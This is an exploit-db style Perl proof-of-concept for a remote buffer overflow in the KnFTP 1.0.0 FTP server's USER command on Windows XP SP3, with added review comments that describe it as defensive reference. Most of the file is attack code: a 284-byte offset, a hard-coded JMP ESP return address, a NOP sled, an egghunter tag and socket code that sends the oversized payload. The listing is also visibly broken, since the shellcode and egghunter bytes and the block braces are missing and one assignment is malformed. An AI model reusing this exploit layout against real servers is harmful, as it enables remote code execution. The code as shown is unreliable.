# Exploit Title: KnFTP1.0.0 Server - Remote Buffer Overflow Exploit,'USER' command
# Date: 19/9/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Tested on: Windows XP SP3 [En]
use IO::Socket;
# Exploit Title: KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit, 'USER' command.
# Date: 19/9/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Tested on: Windows XP SP3 [En]
# NOTE(review): this is an exploit-db style proof-of-concept listing, kept
# here as defensive reference material.  As extracted it is NOT runnable
# Perl: the byte strings that made up $egghunter and $shellcode are absent
# (the lines below collapse into one malformed assignment), and the braces
# of the if/else around the socket handling have been lost.  The comments
# below describe only what the visible code shows.  The file also runs
# without `use strict; use warnings;`, so every variable is a package global.
print "\n#----[ mr.pr0n ]---------------------------------------------------------#\n";
print "#Target App: KnFTP1.0.0 Server #\n";
print "#Attack: Remote Buffer Overflow Exploit - 'USER' command #\n";
print "#Target OS : Windows XP Pro English [Service Pack 3].#\n";
print "#------------------------------[ http://ghostinthelab.wordpress.com ]----#\n";
$target = ""; # Host left blank in the listing; both status messages below interpolate it.
# The egghunter.
# Only the 4-byte tag "w00t" survives in this listing; the trailing "." shows
# the searcher bytes continued on a line that is not present here.
$egghunter =
"w00t". # <-- The 4 byte tag
# Second-stage payload (the original comment only said "Calc.exe"); its bytes
# are missing here.  Combined with the line above this parses as
# `$egghunter = "w00t" . $shellcode = ...`, which Perl rejects.
$shellcode =
# Filler sized so that filler + "w00tw00t" + shellcode is exactly 284 bytes,
# i.e. $eip is placed at offset 284 of the USER argument.
$junk = "\x41" x (284 - length("w00tw00t") - length($shellcode));
# Hard-coded return address tied to the OS build named in the header; it does
# not hold on any build where kernel32.dll is loaded at a different base.
$eip = "\x13\x44\x87\x7c"; # 7C874413 JMP ESP - kernel32.dll
$padding = "\x90" x 15; # 15 NOP bytes (the original comment said 10).
# Wire layout: [A x n]["w00tw00t"][shellcode][eip][15 NOPs][egghunter].
$payload = $junk."w00tw00t".$shellcode.$eip.$padding.$egghunter;
# Defender's view: the observable signature is a single FTP USER command whose
# argument is at least 303 bytes (284 + 4 + 15) plus the egghunter; a length
# check on the USER argument before it is copied is presumably the server-side
# fix, but the vulnerable copy itself is not shown on this page.
# Assignment inside the condition is deliberate: $socket is set only when the
# connect succeeds.  The block braces, and the `else` that separates the four
# success lines from the final failure message, are missing from this listing.
if ($socket = IO::Socket::INET->new (PeerAddr => $target,PeerPort => "21",Proto => "TCP"))
print "\n[*] Sending buffer (".(length($payload))." bytes) to: $target! \n";
# The overflow trigger: the whole buffer is sent as the argument of USER.
print $socket "USER ".$payload. "\r\n";
print $socket "PASS pwned \r\n";
print "[+] OK, exploitation Done!\n";
print "\n[-] Connection to $target failed!\n";